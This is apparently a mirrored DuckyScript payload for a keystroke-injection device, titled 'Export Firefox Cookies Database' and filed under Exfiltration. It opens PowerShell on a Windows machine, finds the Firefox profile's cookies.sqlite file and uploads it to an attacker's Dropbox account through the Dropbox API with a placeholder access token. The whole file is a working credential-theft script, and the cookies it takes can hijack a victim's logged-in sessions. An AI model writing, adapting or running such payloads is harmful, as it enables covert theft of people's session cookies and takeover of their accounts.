mirror of https://github.com/hak5/omg-payloads.git
48 lines
1.7 KiB
Plaintext
48 lines
1.7 KiB
Plaintext
REM ####################################################
|
|
REM # |
|
|
REM # Title : Export Firefox Cookies Database |
|
|
REM # Author : Aleff |
|
|
REM # Version : 1.0 |
|
|
REM # Category : Exfiltration |
|
|
REM # Target : Windows 10-11 |
|
|
REM # |
|
|
REM ####################################################
|
|
|
|
|
|
REM Requirements:
|
|
REM - Firefox must be installed
|
|
|
|
|
|
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
|
|
DEFINE DROPBOX_ACCESS_TOKEN "example"
|
|
|
|
DEFAULT_DELAY 500
|
|
GUI r
|
|
STRINGLN powershell
|
|
DELAY 2000
|
|
|
|
|
|
REM Get cookies DB path
|
|
STRINGLN_BLOCK
|
|
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
|
|
$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
|
|
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
|
|
END_STRINGLN
|
|
|
|
REM Setting about exfiltration
|
|
STRINGLN $accessToken = DROPBOX_ACCESS_TOKEN
|
|
ENTER
|
|
|
|
STRINGLN_BLOCK
|
|
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
|
|
|
|
$dropboxFilePath = "/cookies_exported.sqlite"
|
|
|
|
$headers = @{}
|
|
$headers.Add("Authorization", "Bearer $accessToken")
|
|
$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
|
|
$headers.Add("Content-Type", "application/octet-stream")
|
|
|
|
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath; exit;
|
|
END_STRINGLN
|